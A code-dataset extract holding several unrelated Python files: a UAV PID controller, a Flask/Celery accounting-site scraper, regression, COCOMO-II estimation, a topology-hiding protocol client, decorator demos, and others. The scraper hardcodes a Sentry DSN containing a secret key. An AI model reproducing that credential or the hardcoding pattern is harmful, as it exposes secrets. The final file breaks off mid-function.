print("Did not get the PID gain p from the params, defaulting to 9.0")
self.propGain_ = np.array([9.0, 9.0, 9.0])
if 'intGain' in kwargs:
self.intGain_ = kwargs['intGain']
else:
if self.flag_debug:
print("Did not get the PID gain i from the params, defaulting to 3.0")
self.intGain_ = np.array([3.0, 3.0, 3.0])
if 'derGain' in kwargs:
self.derGain_ = kwargs['derGain']
else:
if self.flag_debug:
print("Did not get the PID gain d from the params, defaulting to 0.3")
self.derGain_ = np.array([0.3, 0.3, 0.3])
# PID Controller Integrator State and Bound
self.intState_ = np.array([0., 0., 0.])
if 'intBound' in kwargs:
self.intBound_ = kwargs['intBound']
else:
if self.flag_debug:
print("Did not get the PID integrator bound from the params, defaulting to 1000.0")
self.intBound_ = np.array([1000., 1000., 1000.])
return
def control_update(self, angVelCommand, thrustCommand, curval, curder, dt):
angAccCommand = np.zeros(3)
stateDev = angVelCommand - curval
self.intState_ += dt*stateDev
self.intState_ = np.fmin(np.fmax(-self.intBound_,self.intState_),self.intBound_)
angAccCommand = self.propGain_*stateDev + \
self.intGain_*self.intState_ - self.derGain_*curder
propSpeedCommand = self.thrust_mixing(angAccCommand, thrustCommand)
return propSpeedCommand
def reset_state(self):
self.intState_ = np.zeros(3)
return
# PID position controller
class UAV_pid_waypoint(UAV_pid_angular_rate):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# PID Controller Gains (x, y, z)
if 'positionGain' in kwargs:
self.position_gain = kwargs['positionGain']
else:
self.position_gain = np.array([7., 7., 7.])
if 'velocityGain' in kwargs:
self.velocity_gain = kwargs['velocityGain']
else:
self.velocity_gain = np.array([3., 3., 3.])
if 'integratorGain' in kwargs:
self.integrator_gain = kwargs['integratorGain']
else:
self.integrator_gain = np.array([0., 0., 0.])
if 'attitudeGain' in kwargs:
self.attitude_gain = kwargs['attitudeGain']
else:
self.attitude_gain = np.array([10., 10., 10.])
if 'thrustDirection' in kwargs:
self.thrust_dir = kwargs['thrustDirection']
else:
self.thrust_dir = np.array([0., 0., -1.])
if 'maxAcceleration' in kwargs:
self.max_acceleration = kwargs['maxAcceleration']
else:
self.max_acceleration = 3.0
if 'maxAngrate' in kwargs:
self.max_angrate = kwargs['maxAngrate']
else:
self.max_angrate = 8.0
if 'maxSpeed' in kwargs:
self.max_speed = kwargs['maxSpeed']
else:
self.max_speed = 3.0
self.max_velocity_poserror = self.max_speed*(self.velocity_gain/self.position_gain)
self.position_error_integrator = np.zeros(3)
return
def saturateVector(self, vec, bound):
if isinstance(bound, np.ndarray):
ret_vec = copy.deepcopy(vec)
bound_t = np.squeeze(bound)
for i in range(bound_t.shape[0]):
ret_vec[i] = max(-bound_t[i], min(vec[i], bound_t[i]))
return ret_vec
else:
return np.fmax(-bound, np.fmin(vec, bound))
def get_control(self, pos_err, att_cur, curvel, att_ref):
# getAccelerationCommand
sat_pos_err = self.saturateVector(pos_err, self.max_velocity_poserror)
acc_cmd = self.position_gain*sat_pos_err \
- self.velocity_gain*curvel \
+ self.integrator_gain*self.position_error_integrator
# saturateVector
acc_cmd = self.saturateVector(acc_cmd, self.max_acceleration)
acc_cmd[2] -= 9.81
thrust_cmd = self.vehicleMass_*acc_cmd
# getAttitudeCommand
thrustcmd_yawframe = quat_rotate(att_ref, thrust_cmd)
thrust_rot = vecvec2quat(self.thrust_dir, thrustcmd_yawframe)
att_cmd = mul_quat(att_ref, thrust_rot)
# getAngularRateCommand
att_error = mul_quat(inv_quat(att_cur), att_cmd)
if att_error[0] < 0.:
att_error *= -1.
angle_error = quat2Euler(att_error)
angrate_cmd = angle_error*self.attitude_gain
scalar_thrust = np.linalg.norm(thrust_cmd)
angrate_cmd = self.saturateVector(angrate_cmd, self.max_angrate)
res = dict()
res["angularrate"] = angrate_cmd
res["thrust"] = scalar_thrust
return res
def control_update(self, command, curpos, curvel, curatt, curattVel, curattAcc, dt):
# Get position offsets
del_x = command[0] - curpos[0]
del_y = command[1] - curpos[1]
del_z = command[2] - curpos[2]
pos_err = np.array([del_x, del_y, del_z])
self.position_error_integrator += dt*pos_err
if command.size == 4:
yaw_ref = command[3]
else:
# yaw_ref = quat2Euler(curatt)[2]
yaw_ref = 0.0
att_ref = Euler2quat(np.array([0,0,yaw_ref]))
att_cur = Euler2quat(np.array([curatt[0],curatt[1],curatt[2]]))
res = self.get_control(pos_err, att_cur, curvel, att_ref)
attVelCommand = np.array([res["angularrate"][0],res["angularrate"][1],res["angularrate"][2]])
stateDev = attVelCommand - curattVel
self.intState_ += dt*stateDev
self.intState_ = np.fmin(np.fmax(-self.intBound_,self.intState_),self.intBound_)
angAccCommand = self.propGain_*stateDev + \
self.intGain_*self.intState_ - self.derGain_*curattAcc
propSpeedCommand = self.thrust_mixing(angAccCommand, res["thrust"])
return propSpeedCommand
def reset_state(self):
self.intState_ = np.zeros(3)
self.position_error_integrator = np.zeros(3)
return
if __name__ == "__main__":
    # execute only if run as a script -- minimal smoke output, no controller run
    print("test")
|
993,414 | a48a3dd9ce903f76356eeb95fa4352cb3a2df6e6 | # -*- coding:utf-8 -*-
import json
from celery import signature
from flask import jsonify # Content-Type: application/json Content-Type: text/html; charset=utf-8
# celeryApp = Celery(broker=Config.CELERY_BROKER_URL)
# celeryApp.conf.update(app.config)
# celeryApp.autodiscover_tasks(['yiqidai','yunzhangfang','huisuanzhang'])
from flask import request
from raven.contrib.flask import Sentry
from config import Config
# from public.docker_for_browsers import DockerForBrowsers
from App import app # falsk
#使用sentry监听异常
from task.main import export_tasks # celely
# NOTE(review): the Sentry DSN (including its secret) is hardcoded here; it
# should come from configuration or the environment instead.
sentry = Sentry(app, dsn='https://cc465b09e4004bd790db724a7d4252eb:6f73513a850d4e26b34612de0a08f7c9@192.168.20.244:9000//6')
# Initialize the browser pool shared by the request handlers below.
from public.pool import PoolOptions,Pool
options = PoolOptions()
pool = Pool(options)
@app.route('/task', methods=['post'])
def export_task():
    """Dispatch an accounting-export celery task for the requested site.

    Accepts either a JSON body or form data carrying: db_name (site key),
    login_info (credentials, JSON-encoded in the form case), zt (account-set
    list) and callback_ip. Logs into the site, scrapes the available account
    sets, queues the export task, and returns JSON with 'msg' plus, on
    success, the scraped account-set names under 'zt'.
    """
    # login_info carries the company number / account / password.
    data = request.json or {}
    res = {}
    site = ''
    login_info = {}
    ztList = []
    callback_ip = ''
    if not data:
        if not request.form:
            res['msg'] = '没有数据'
        else:
            site = request.form.get('db_name', '')
            login_info = request.form.get('login_info', '')
            callback_ip = request.form.get('callback_ip', '')
            login_info = json.loads(login_info)
            zt = request.form.get('zt', '')
            ztList = json.loads(zt)
    else:
        site = data.get('db_name', '')
        login_info = data.get('login_info', '')
        # Bug fix: this branch used to read callback_ip from request.form,
        # which is empty for application/json requests, so the callback IP
        # was silently dropped; read it from the JSON body like the other
        # fields.
        callback_ip = data.get('callback_ip', '')
        ztList = data.get('zt', '')
    if site == 'kungeek':
        browser = pool.get_browser('chrome', 'kungeek')
        msg = try_to_login(browser, login_info, 'HSZ')
        if msg == '登陆成功':
            from huisuanzhang.NewViews import GetInfo
            gti = GetInfo(browser)
            ztData = gti.getAllzt()
            pool.close_browser(browser)
            export_tasks(login_info, ztList, site, callback_ip, queue='export_out_kungeek')
            # NOTE(review): `id` here is the Python builtin function, so this
            # yields "<built-in function id>" — confirm which identifier was
            # meant to be reported.
            res['id'] = str(id)
            res['msg'] = 'ok'
            res['zt'] = [item['name'].strip() for item in ztData]
        else:
            res['msg'] = msg
    elif site == '17DZ':
        browser = pool.get_browser('chrome', 'yiqidai')
        msg = try_to_login(browser, login_info, '17DZ')
        if msg == '登陆成功':
            from yiqidai.NewViews import GetInfo
            dz = GetInfo(browser)
            ztData = dz.getAllzt()
            pool.close_browser(browser)
            export_tasks(login_info, ztList, site, callback_ip, queue='export_out_yiqidai')
            res['msg'] = 'ok'
            res['zt'] = [item['customerFullName'].strip() for item in ztData]
        else:
            res['msg'] = msg
    elif site == 'yunzhangfang':
        browser = pool.get_browser('chrome', 'yunzhangfang')
        msg = try_to_login(browser, login_info, 'YZF')
        if msg == '登陆成功':
            from yunzhangfang.NewViews import GetInfo
            yzf = GetInfo(browser)
            ztData = yzf.getAllzt()
            pool.close_browser(browser)
            export_tasks(login_info, ztList, site, callback_ip, queue='export_out_yunzhangfang')
            res['msg'] = 'ok'
            res['zt'] = [item['qymc'].strip() for item in ztData]
        else:
            res['msg'] = msg
    elif site == 'datawisee':
        browser = pool.get_browser('chrome', 'datawisee')
        msg = try_to_login(browser, login_info, 'QMX')
        if msg == '登陆成功':
            # datawisee shares the yunzhangfang scraper.
            from yunzhangfang.NewViews import GetInfo
            yzf = GetInfo(browser)
            ztData = yzf.getAllzt()
            pool.close_browser(browser)
            export_tasks(login_info, ztList, site, callback_ip, queue='export_out_datawisee')
            res['msg'] = 'ok'
            res['zt'] = [item['qymc'].strip() for item in ztData]
        else:
            res['msg'] = msg
    return jsonify(res)
def try_to_login(browser, login_info, zdhm):
    """Log *browser* into the bookkeeping site identified by *zdhm*.

    zdhm is the site code: 'HSZ' (kungeek/huisuanzhang), '17DZ' (yiqidai),
    'YZF' (yunzhangfang) or 'QMX' (datawisee, which shares the yunzhangfang
    scraper). Returns the login-result message string; retries indefinitely
    on plain login failures and up to 4 times on captcha errors.

    Bug fix: 'QMX' was previously unmapped, leaving getInfo = None and
    crashing with AttributeError even though export_task passes it.
    """
    if zdhm == 'HSZ':
        from huisuanzhang.NewViews import GetInfo
    elif zdhm == '17DZ':
        from yiqidai.NewViews import GetInfo
    elif zdhm in ('YZF', 'QMX'):
        # datawisee ('QMX') uses the yunzhangfang scraper, mirroring the
        # import done in export_task's 'datawisee' branch.
        from yunzhangfang.NewViews import GetInfo
    else:
        raise ValueError('unknown site code: %s' % zdhm)
    getInfo = GetInfo(browser)
    # Login retry loop; i counts attempts for the captcha cut-off below.
    i = 1
    while True:
        msg = getInfo.login(login_info)
        if msg == '登陆成功':
            return msg
        elif msg == '登录失败':
            i += 1
            continue
        elif msg == '账号和密码不匹配,请重新输入':
            return msg
        elif msg == '账号已停用或合同未审核通过':
            return msg
        elif msg == '账号不存在或已停用':
            return msg
        elif i > 4:
            # Give up after repeated captcha failures; needs manual handling.
            return '验证码错误%s次,需要人工介入' % i
        elif msg == '验证码错误,请重新输入':
            i += 1
            continue
if __name__ == '__main__':
    # app.run(host='0.0.0.0',debug=True,processes=4)
    # threaded=False: requests are served serially, which the shared browser
    # pool requires.
    app.run(host='0.0.0.0',port=5500,debug=False,threaded=False)
    # Note: threaded=True would only let *different* routes/requests run on
    # separate threads; it does not parallelise a single request.
|
993,415 | 3431a60513173f82f3ece16302cc8a42fd080d0e | from statistics import mean
import numpy as np
import matplotlib.pyplot as plt
# Toy sample data for the regression demo (a larger real dataset is kept
# commented out below).
xs = np.array([1,2,3,4,5,6], dtype = np.float64)
ys = np.array([5,4,6,5,6,7], dtype = np.float64)
# xs=np.array([12,13,14,15,16,17,18,19,20,21,22,23])
# ys=np.array([202031,208153,188749,165747,150677,142722,136637,143456,135291,118952,103986,93421])
def linear_regression_line(xs, ys):
    """Return (slope, intercept) of the least-squares line through xs/ys.

    Uses the closed-form means formula: m = (x̄·ȳ − mean(x·y)) / (x̄² − mean(x²)).
    """
    x_bar = mean(xs)
    y_bar = mean(ys)
    slope = (x_bar * y_bar - mean(xs * ys)) / (x_bar ** 2 - mean(xs ** 2))
    intercept = y_bar - slope * x_bar
    return slope, intercept
# Fit the line to the sample data and evaluate it at every x.
m,c = linear_regression_line(xs,ys)
reg_line = [m*x+c for x in xs]
def square_error(y_orig, y_reg):
    """Sum of squared residuals between observed and predicted values."""
    residuals = y_orig - y_reg
    return sum(residuals ** 2)
def confidance(y_orig, y_reg):
    """Coefficient of determination (R²) of the regression against y_orig.

    1 minus the ratio of the regression's squared error to the squared
    error of the constant mean(y_orig) baseline.
    """
    baseline = [mean(y_orig)] * len(y_orig)
    ss_regression = square_error(y_orig, y_reg)
    ss_mean = square_error(y_orig, baseline)
    return 1 - (ss_regression / ss_mean)
# Print R^2 of the fit, then plot the data points and the regression line.
confi_r = confidance(ys,reg_line)
print(confi_r)
plt.scatter(xs,ys)
plt.plot(xs,reg_line)
plt.show()
|
993,416 | 8fc07007d86e86a6b7baa5350ca7c39ad8820089 | from __future__ import division,print_function
import sys
sys.dont_write_bytecode = True
from lib import *
import numpy as np
_ = 0  # placeholder for rating levels that are undefined for an attribute

# COCOMO-II calibration table: one row per attribute; columns are the rating
# levels very-low, low, nominal, high, very-high, extra-high.
Coc2tunings = {
    # vl l nom h vh xh
    # Scale Factors
    'Flex' : [5.07, 4.05, 3.04, 2.03, 1.01, _],
    'Pmat' : [7.80, 6.24, 4.68, 3.12, 1.56, _],
    'Prec' : [6.20, 4.96, 3.72, 2.48, 1.24, _],
    'Resl' : [7.07, 5.65, 4.24, 2.83, 1.41, _],
    'Team' : [5.48, 4.38, 3.29, 2.19, 1.01, _],
    # Effort Multipliers
    'acap' : [1.42, 1.19, 1.00, 0.85, 0.71, _],
    'aexp' : [1.22, 1.10, 1.00, 0.88, 0.81, _],
    'cplx' : [0.73, 0.87, 1.00, 1.17, 1.34, 1.74],
    'data' : [ _, 0.90, 1.00, 1.14, 1.28, _],
    'docu' : [0.81, 0.91, 1.00, 1.11, 1.23, _],
    'ltex' : [1.20, 1.09, 1.00, 0.91, 0.84, _],
    'pcap' : [1.34, 1.15, 1.00, 0.88, 0.76, _],
    'pcon' : [1.29, 1.12, 1.00, 0.90, 0.81, _],
    'plex' : [1.19, 1.09, 1.00, 0.91, 0.85, _],
    'pvol' : [ _, 0.87, 1.00, 1.15, 1.30, _],
    'rely' : [0.82, 0.92, 1.00, 1.10, 1.26, _],
    'ruse' : [ _, 0.95, 1.00, 1.07, 1.15, 1.24],
    'sced' : [1.43, 1.14, 1.00, 1.00, 1.00, _],
    'site' : [1.22, 1.09, 1.00, 0.93, 0.86, 0.80],
    'stor' : [ _, _, 1.00, 1.05, 1.17, 1.46],
    'time' : [ _, _, 1.00, 1.11, 1.29, 1.63],
    'tool' : [1.17, 1.09, 1.00, 0.90, 0.78, _]
}
def cocomo2(dataset, project,
            a=2.94, b=0.91,
            tunes=Coc2tunings,
            decisions=None,
            noise=None):
    """Estimate effort for *project* with the COCOMO-II model.

    Columns 0-4 of a project are scale factors (summed), columns 5-21 are
    effort multipliers (multiplied), and column 22 holds KLOC. *decisions*
    selects which columns participate (defaults to dataset.decisions);
    *noise*, if given, perturbs KLOC by a uniform factor.
    """
    if decisions is None:
        decisions = dataset.decisions
    KLOC_INDEX = 22       # column holding lines-of-code
    N_SCALE_FACTORS = 5   # columns 0-4 are scale factors; 5-21 multipliers
    sf_sum = 0
    em_prod = 1
    for d in decisions:
        if d < N_SCALE_FACTORS:
            sf_sum += tunes[dataset.indep[d]][project[d] - 1]
        elif d < KLOC_INDEX:
            em_prod *= tunes[dataset.indep[d]][project[d] - 1]
        elif d == KLOC_INDEX:
            continue
        else:
            raise RuntimeError("Invalid decisions : %d" % d)
    if noise is None:
        kloc_val = project[KLOC_INDEX]
    else:
        r = random.random()
        kloc_val = project[KLOC_INDEX] * (abs(1 - noise) + (2 * noise * r))
    return a * em_prod * kloc_val ** (b + 0.01 * sf_sum)
def coconut(dataset,
            training,            # list of projects
            a=10, b=1,           # initial (a,b) guess
            deltaA=10,           # range of "a" guesses
            deltaB=0.5,          # range of "b" guesses
            depth=10,            # max recursive calls
            constricting=0.66,   # next time, guess less
            decisions=None,
            noise=None):
    """Recursively refine the COCOMO (a, b) parameters on *training*.

    Each level samples guesses (via guesses()) inside a shrinking search
    box; recursion stops when no better guess is found or depth runs out.

    Bug fix: the recursive call previously dropped ``constricting``,
    ``decisions`` and ``noise``, so every level after the first silently
    reverted to the defaults; they are now threaded through.
    """
    if depth > 0:
        useful, a1, b1 = guesses(dataset, training, a, b, deltaA, deltaB,
                                 decisions=decisions, noise=noise)
        if useful:  # only continue if something useful was found
            return coconut(dataset, training,
                           a1, b1,                 # our new next guess
                           deltaA * constricting,
                           deltaB * constricting,
                           depth - 1,
                           constricting,
                           decisions=decisions,
                           noise=noise)
    return a, b
def guesses(dataset, training, a, b, deltaA, deltaB,
            repeats=20, decisions=None, noise=None):  # number of guesses
    """Sample *repeats* random (a, b) pairs inside the current search box.

    Returns (useful, best_a, best_b) where useful is True iff some guess
    scored a lower training error than any seen so far.
    """
    useful, a1, b1, least, n = False, a, b, 10**32, 0
    while n < repeats:
        n += 1
        # rand() comes from `from lib import *` at the top of the file.
        aGuess = a - deltaA + 2 * deltaA * rand()
        bGuess = b - deltaB + 2 * deltaB * rand()
        error = assess(dataset, training, aGuess, bGuess, decisions=decisions, noise=noise)
        if error < least:  # found a new best guess
            useful, a1, b1, least = True, aGuess, bGuess, error
    return useful, a1, b1
def assess(dataset, training, aGuess, bGuess, decisions=None, noise=None):
    """Mean magnitude of relative error of cocomo2(aGuess, bGuess) over
    the *training* projects (lower is better)."""
    error = 0.0
    for project in training:  # find error on training
        predicted = cocomo2(dataset, project.cells, aGuess, bGuess, decisions=decisions, noise=noise)
        actual = effort(dataset, project)
        error += abs(predicted - actual) / actual
    return error / len(training)  # mean training error
## Reduced COCOMO
def prune_cocomo(model, rows, row_count, column_ratio):
    """Select a random subset of rows and the lowest-"entropy" columns.

    Keeps *row_count* shuffled rows, scores every non-KLOC column by the
    weighted within-group effort variance of its values, and keeps the
    best column_ratio fraction plus the KLOC column.
    Returns (pruned_rows, sorted_column_indices).
    """
    pruned_rows = shuffle(rows[:])[:row_count]
    loc_column, rest = model.decisions[-1], model.decisions[:-1]
    entropies = []
    for decision in rest:
        effort_map = get_column_vals(model, pruned_rows, decision)
        entropy = 0
        for key, efforts in effort_map.items():
            # Bug fix: np.asscalar() was removed in NumPy 1.23; float() is
            # the supported equivalent for a 0-d result.
            variance = float(np.var(efforts))
            n = len(efforts)
            entropy += n * variance / len(pruned_rows)
        entropies.append((entropy, decision))
    entropies = sorted(entropies)[:int(round(column_ratio * len(rest)))]
    columns = sorted([entropy[1] for entropy in entropies] + [loc_column])
    return pruned_rows, columns
def get_column_vals(model, rows, col_index):
    """Group row efforts by the value found in column *col_index*.

    Returns {column_value: [effort(model, row), ...]} over *rows*.
    """
    grouped = {}
    for row in rows:
        key = row.cells[col_index]
        grouped.setdefault(key, []).append(effort(model, row))
    return grouped
def shuffle(lst):
    """Shuffle *lst* in place and return it; a falsy input yields []."""
    if lst:
        random.shuffle(lst)
        return lst
    return []
|
993,417 | 4f00364b83b301418a280b7883755f92d3891825 | import argparse
import socket
import topohiding
from topohiding.helperfunctions import FakeHPKCR, HPKCR, find_generator
import struct
import base64
import os
import time
# Test Commands:
# python3.6 cli.py -k 5 -v 1 -p 60002 -b 2 -i foo1 -n 127.0.0.1:60001
# python3.6 cli.py -k 5 -v 1 -p 60001 -b 2 -i foo0 -n 127.0.0.1:60002
#
def receive_exact(s, n):
    """Read exactly *n* bytes from socket *s*, looping over short reads."""
    chunks = [s.recv(n)]
    received = len(chunks[0])
    while received < n:
        chunk = s.recv(n - received)
        chunks.append(chunk)
        received += len(chunk)
    return b"".join(chunks)
def receive_string(s):
    """Receive a length-prefixed UTF-8 string from socket *s*.

    Wire format: 4-byte unsigned-int length followed by the payload.
    NOTE(review): "I" uses native byte order/size — both peers must share
    the same platform representation; confirm this is intended.
    """
    size = receive_exact(s, 4)
    size = struct.unpack("I", size)[0]
    res = receive_exact(s,size).decode("utf-8")
    return res
def transmit_string(s, str_tx):
    """Send *str_tx* on socket *s* as a 4-byte length prefix plus UTF-8 bytes."""
    payload = str_tx.encode("utf-8")
    header = struct.pack("I", len(payload))
    s.send(header + payload)
start_time = time.time()

# Parse the list of neighbors in IP:Port form plus this node's input bit for
# the distributed OR computation.
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--nodes', nargs='*', action='append', type=str, required=True)
parser.add_argument('-i', '--id', type=str, required=False, default=base64.b64encode(os.urandom(16)).decode('utf-8'))
parser.add_argument('-b', '--bound', type=int, required=True)  # upper bound on total number of neighbors
parser.add_argument('-p', '--port', type=int, required=True)
parser.add_argument('-v', '--value', type=int, required=True)
parser.add_argument('-k', '--kappa', type=int, required=True)
parser.add_argument('-t', '--timer', action='store_true', default=False)
args = parser.parse_args()

node_hostnames = []
node_ports = []
node_addr = []
node_connections = []
for node_info in args.nodes[0]:
    hostname, port = node_info.split(':')
    node_hostnames.append(hostname)
    node_ports.append(int(port))
print(node_hostnames)
print(node_ports)
print(args.nodes)
print(len(args.nodes[0]))

# rx socket: accept one inbound connection per neighbor.
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(('0.0.0.0', args.port))
serversocket.listen(len(args.nodes[0]))
print("Value: "+ str(args.value))
input("Waiting for other clients to come online. Press any key to continue.")

# create tx sockets and announce our id on each
tx_sockets_tmp = []
rx_sockets = {}
tx_sockets = {}
for index in range(len(args.nodes[0])):
    clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    clientsocket.connect((node_hostnames[index], node_ports[index]))
    transmit_string(clientsocket, args.id)
    tx_sockets_tmp.append(clientsocket)
# accept rx sockets and reply to name
for index in range(len(args.nodes[0])):
    connection, address = serversocket.accept()
    client_name = receive_string(connection)
    transmit_string(connection, args.id)
    rx_sockets[client_name] = connection
# check for replies and restablish tx_socket / name mapping
for tx_socket in tx_sockets_tmp:
    client_name = receive_string(tx_socket)
    tx_sockets[client_name] = tx_socket
node_names = list(rx_sockets.keys())

# init topohiding class
# NOTE(review): q and g are tiny demo parameters — not cryptographically
# meaningful for real use.
q = 1559
g = 2597
#g = find_generator(q)
hpkcr = HPKCR(g, q)
topo = topohiding.TopoHiding(hpkcr, args.kappa, args.bound, len(args.nodes[0]), args.value)

# do first round to obtain the initial outgoing messages
tx_messages = topo.do_round(0, None)
rx_messages = ['']*len(tx_messages)
print(node_names)
# Protocol runs 2 * n_rounds message-exchange rounds.
for round_number in range(1, 2 * topo.n_rounds + 1):
    print(round_number)
    # send message to tx_sockets
    for index in range(len(node_names)):
        print(tx_messages[index])
        transmit_string(tx_sockets[node_names[index]], tx_messages[index])
    # receive message from rx_sockets
    for index in range(len(node_names)):
        rx_messages[index] = receive_string(rx_sockets[node_names[index]])
    # compute next round
    tx_messages = topo.do_round(round_number, rx_messages)
print("FINAL ANSWER:", tx_messages)
if(args.timer):
    print("--- %s seconds ---" % (time.time() - start_time))
|
993,418 | 2e03b82406df019e27998f4c4c3f61ac65f0e151 | # grabs 3 dictionaries containing shopping lists and merges them into one shopping list
# Original dictionaries, modified so 'apples' appears in two of them to
# exercise the duplicate-value case. Two copies are kept because version 1
# mutates its inputs while normalising them.
roommate1Shopping = {'fruit': 'apples', 'meat': 'chicken', 'vegetables': 'potatoes',
                     'drinks': ['beer','wine','vodka'], 'dessert': 'ice cream'}
roommate2Shopping = {'fruit': 'lemons', 'meat': 'hamburger',
                     'drinks': ['apple juice', 'orange juice', 'vodka']}
roommate3Shopping = {'fruit': ['apples','oranges', 'bananas'],
                     'vegetables': ['lettuce', 'carrots'], 'drinks': 'milk'}

rs1 = {'fruit': 'apples', 'meat': 'chicken', 'vegetables': 'potatoes',
       'drinks': ['beer','wine','vodka'], 'dessert': 'ice cream'}
rs2 = {'fruit': 'lemons', 'meat': 'hamburger',
       'drinks': ['apple juice', 'orange juice', 'vodka']}
rs3 = {'fruit': ['apples','oranges', 'bananas'],
       'vegetables': ['lettuce', 'carrots'], 'drinks': 'milk'}

inputLists = [roommate1Shopping, roommate2Shopping, roommate3Shopping]
inputLists2 = [rs1, rs2, rs3]

# --- Version 1: normalise every value to a list first, then concatenate ---
for shopping in inputLists:
    for category in shopping:
        if not isinstance(shopping[category], list):
            shopping[category] = [shopping[category]]

mergedList = {}
for shopping in inputLists:
    for category in shopping:
        if category in mergedList:
            mergedList[category].extend(shopping[category])
        else:
            mergedList[category] = shopping[category]

print('===== MERGED LIST:')
print(mergedList)

# --- Version 2: merge without the up-front list conversion ----------------
# A category seen once keeps its original (possibly scalar) value; on a
# later occurrence both sides are coerced to lists and concatenated.
mergedList2 = {}
for shopping in inputLists2:
    for category in shopping:
        incoming = shopping[category]
        if category not in mergedList2:
            mergedList2[category] = incoming
            continue
        current = mergedList2[category]
        if not isinstance(current, list):
            current = [current]
            mergedList2[category] = current
        current.extend(incoming if isinstance(incoming, list) else [incoming])

print('===== MERGED LIST:')
print(mergedList2)
|
993,419 | 5c4bb7b95d715d25a952f98aef84f02393e71468 | import cv2
import numpy as np
def main():
    """Load an image, shrink it, and display its three mirror flips."""
    # Original image path (hard-coded).
    img_src = "C:/Users/wsChoe/customDataset/labelImg/data/original_img/1.jpg"
    img_source = cv2.imread(img_src)
    # Shrink the image. NOTE(review): the window title says "x0.5" but the
    # scale factors are 0.15 — confirm which was intended.
    img_result = cv2.resize(img_source, None, fx=0.15, fy=0.15, interpolation = cv2.INTER_AREA)
    cv2.imshow("x0.5 INTER_AREA", img_result)
    cv2.waitKey(0)
    # Mirror the shrunk image about each axis.
    dst2 = cv2.flip(img_result, 0)   # flip about the x-axis
    dst3 = cv2.flip(img_result,-1)   # flip about both axes
    dst4 = cv2.flip(img_result,1)    # flip about the y-axis
    cv2.imshow("src", img_result)
    cv2.imshow("dst2", dst2)
    cv2.imshow("dst3", dst3)
    cv2.imshow("dst4", dst4)
    cv2.waitKey()
    cv2.destroyAllWindows()

if __name__ == "__main__":
    main()
993,420 | 91f40e99627fb98a48f727dc30aa2b1e287d820c | import argparse
import numpy as np
from pathlib import Path
import matplotlib.pyplot as plt
from test_mask import test_topk
def run_experiment(data_path, masking_features):
    """
    Compares concrete dropout to randomly picking k features.

    For each k, records the test AUROC of a random-k baseline and of the
    dropout feature-ranking method, saves both arrays under data_path, and
    writes a comparison plot (Result.png).
    """
    random_roc = []
    dropout_roc = []
    k_values = [5, 10, 15, 20, 25, 30, 37]
    for k in k_values:
        random_roc.append(test_topk(data_path, k, masking_features, random_k=True))
        dropout_roc.append(test_topk(data_path, k, masking_features, random_k=False))
    # save the arrays
    mask_folder = 'with_masking' if masking_features else 'without_masking'
    np.save(data_path/mask_folder/'random_roc.npy', random_roc)
    np.save(data_path/mask_folder/'dropout_roc.npy', dropout_roc)
    # plot the roc curve, and save that too
    fig, ax = plt.subplots(figsize=(10, 10))
    ax.plot(k_values, random_roc, label='Random')
    ax.plot(k_values, dropout_roc, label='Dropout FR')
    ax.set_xlabel('Number of features')
    ax.set_ylabel('Test AUROC')
    ax.legend()
    plt.savefig(data_path/mask_folder/'Result.png', bbox_inches='tight', transparent=True)

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--data-path', default=None)
    parser.add_argument('--masking-features', action='store_true')
    args = parser.parse_args()
    # Default to the local 'data' directory when no path is supplied.
    if args.data_path:
        run_experiment(Path(args.data_path), args.masking_features)
    else:
        run_experiment(Path('data'), args.masking_features)
|
993,421 | a6884076ce65f766d69dceab0b187ff48b7d193d | # 装饰器的本质就是闭包
# 装饰器的作用,在不修改原函数的前提下,实现函数功能的拓展。
def login(index):
    """Decorator: gate the wrapped zero-argument function behind a
    username/password prompt (demo credentials: python / 123)."""
    def wrapper():
        expected_user = 'python'
        expected_password = '123'
        user = input('请输入用户名')
        pwd = input('请输入密码')
        if user == expected_user and pwd == expected_password:
            index()  # run the decorated function on success
        else:
            print("用户名或密码错误")
    return wrapper
# @login --> syntactic sugar:
# equivalent to `index = login(index)`: the undecorated index is passed into
# login, which returns foo, and foo is rebound to the name index. The
# original index survives inside foo's closure (index.__closure__).
# Calling index() therefore runs foo().
@login
def index():
    """Demo page handler; only runs after a successful login prompt."""
    print('欢迎来到首页')

# index()
# index=login(index)
# print(index.__closure__)
# index()
# Decorator variant for functions that take arguments.
def login2(buy):
    """Like login(), but forwards arbitrary positional/keyword arguments
    to the wrapped function after a successful credential prompt."""
    def wrapper(*args, **kwargs):
        expected_user = 'python'
        expected_password = '123'
        user = input('请输入用户名')
        pwd = input('请输入密码')
        if user == expected_user and pwd == expected_password:
            buy(*args, **kwargs)  # pass the caller's arguments through
        else:
            print("用户名或密码错误")
    return wrapper
@login2
def buy(name):
    """Print a purchase message; gated behind login2's credential prompt."""
    print('购买了{}商品'.format(name))

# buy('张三')
# Decorating a class.
def login3(Myclass):
    """Class decorator: prompt for credentials before instantiating the
    wrapped class; returns the new instance on success, None otherwise."""
    def wrapper(*args, **kwargs):
        expected_user = 'python'
        expected_password = '123'
        user = input('请输入用户名')
        pwd = input('请输入密码')
        if user == expected_user and pwd == expected_password:
            # Instantiation produces a value, so it must be returned
            # (unlike the plain-function decorators above).
            return Myclass(*args, **kwargs)
        else:
            print("用户名或密码错误")
    return wrapper
@login3
class Myclass:
    """Toy class whose construction is gated by login3's credential prompt."""
    def __init__(self,n,m):
        self.n = n
        self.m = m
    def add(self):
        return (self.n+self.m)

# NOTE(review): Myclass(3, 4) triggers the interactive login prompt at import
# time; on a failed login the decorator returns None and my.add() raises
# AttributeError — confirm this is acceptable for the demo.
my = Myclass(3,4)
print(my.add())
|
993,422 | 292c761f620fef0db5b9d86a31b0054ae6576365 | class Solution:
def canJump(self, nums: List[int]) -> bool:
n, pos = len(nums), 0
for i in range(n):
if i <= pos:
pos = max(pos, i + nums[i])
if pos >= n - 1:
return True
return False |
993,423 | ab8ab86d54edac6ea03ac9737b6754f16a55b32c | import networkx as nx
import numpy as np
import re
def make_graph(lines):
    """Build a DiGraph with an edge (outer bag -> inner bag) per rule,
    weighted by how many inner bags the outer bag holds (AoC 2020 day 7)."""
    lines = [line[:-1] for line in lines]  # strip trailing newlines
    g = nx.DiGraph()
    for line in lines:
